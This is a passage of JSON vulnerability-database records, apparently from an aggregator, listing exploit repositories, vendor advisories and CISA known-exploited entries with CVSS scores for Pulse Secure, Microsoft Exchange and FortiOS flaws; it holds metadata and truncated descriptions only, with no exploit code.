"version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-27T09:21:10", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-12-05T21:57:04", "id": "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:06", "description": "# pulsexploit\nAutomated script for Pulse Secure SSL VPN exploit ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-27T15:06:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-12-13T12:56:51", "id": "059DC199-E425-50EE-B5F5-E351E0323E69", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T13:54:43", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-17T17:53:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-11-05T21:41:20", "id": "00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T09:34:30", "description": "# CVE-2019-11510\nExploit for Arbitrary File Read on Pulse Secure...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-08-21T08:40:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-08-17T05:58:09", "id": "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:12:24", "description": "[![made-with-bash](https://img.shields.io/badge/Made%20with-Bash...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T15:16:24", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-03-20T06:54:20", "id": "F1CA855B-967C-5A5E-9256-FDDE87702713", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:35:26", "description": "# CVE-2020-0688 Scanner\nThis is a little dirty Script to Check f...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-27T23:55:04", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-12-15T14:38:28", "id": "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:46:03", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-28T16:04:30", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-12-15T14:38:28", "id": "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T17:57:08", "description": "# Exchange Remote Code Execution (cve-2020-0688) - RED TEAM [MOD...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-12T08:28:35", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2022-07-02T07:14:36", "id": "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:30:16", "description": "# ecp_slap\nThis proof-of-concept for [CVE-2020-0688](https://cve...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-23T01:18:13", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2022-03-25T01:04:55", "id": "8C937DCD-4090-5A44-9361-4D9ECF545843", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:51:57", "description": "<b>[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-17T12:41:51", "type": "githubexploit", "title": "Exploit for Use of Hard-coded Credentials in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-08-19T10:39:41", "id": "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T20:18:15", "description": "# cve-2020-0688\nUsage:\n```\nusage: cve-2020-0688.py [-h] -s SERVE...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-27T02:54:27", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2022-08-15T15:41:33", "id": "AAC2853C-A655-5E80-9262-A654102B874A", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:29:25", "description": "# CVE-2020-0688\r\n\r\nA remote code execution vulnerability exists ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-04T10:48:40", "type": "githubexploit", "title": "Exploit for Improper Authentication in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-10-13T07:24:05", "id": "39732E15-7AF0-5FC2-851B-B63466C0F2F2", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-06T10:03:57", "description": "# check-your-pulse #\n\n[![GitHub Build Status](https://github.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-04-16T16:32:47", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781"], "modified": "2022-03-06T07:12:20", "id": "62891769-2887-58A7-A603-BCD5E6A6D6F9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "File disclosure vulnerability in Pulse Connect Secure SSL VPN\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-27T00:00:00", "type": "dsquare", "title": "Pulse Connect Secure File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2019-08-27T00:00:00", "id": "E-688", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File disclosure vulnerability in Fortinet FortiGate SSL VPN fgt_lang lang parameter\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-08-17T00:00:00", "type": "dsquare", "title": "Fortinet FortiGate SSL VPN File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-17T00:00:00", "id": "E-691", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:19:47", "description": "A file disclosure vulnerability exists in Pulse Connect Secure. Successful exploitation of this vulnerability would allow a remote attacker to list directories on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-09-04T00:00:00", "type": "checkpoint_advisories", "title": "Pulse Connect Secure File Disclosure (CVE-2019-11510)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2019-09-04T00:00:00", "id": "CPAI-2019-1097", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:30:11", "description": "A directory traversal vulnerability exists in Fortinet FortiOS. Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-17T00:00:00", "type": "checkpoint_advisories", "title": "Fortinet FortiOS SSL VPN Directory Traversal (CVE-2018-13379)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2019-10-28T00:00:00", "id": "CPAI-2018-1187", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:40:35", "description": "A remote code execution vulnerability exists in Microsoft Exchange Server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-01T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2020-0688)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2020-05-01T00:00:00", "id": "CPAI-2020-0104", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "An unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Pulse Connect Secure VPN arbitrary file reading vulnerability (COVID-19-CTI list)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-11510", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Fortinet FortiOS SSL VPN credential exposure vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": 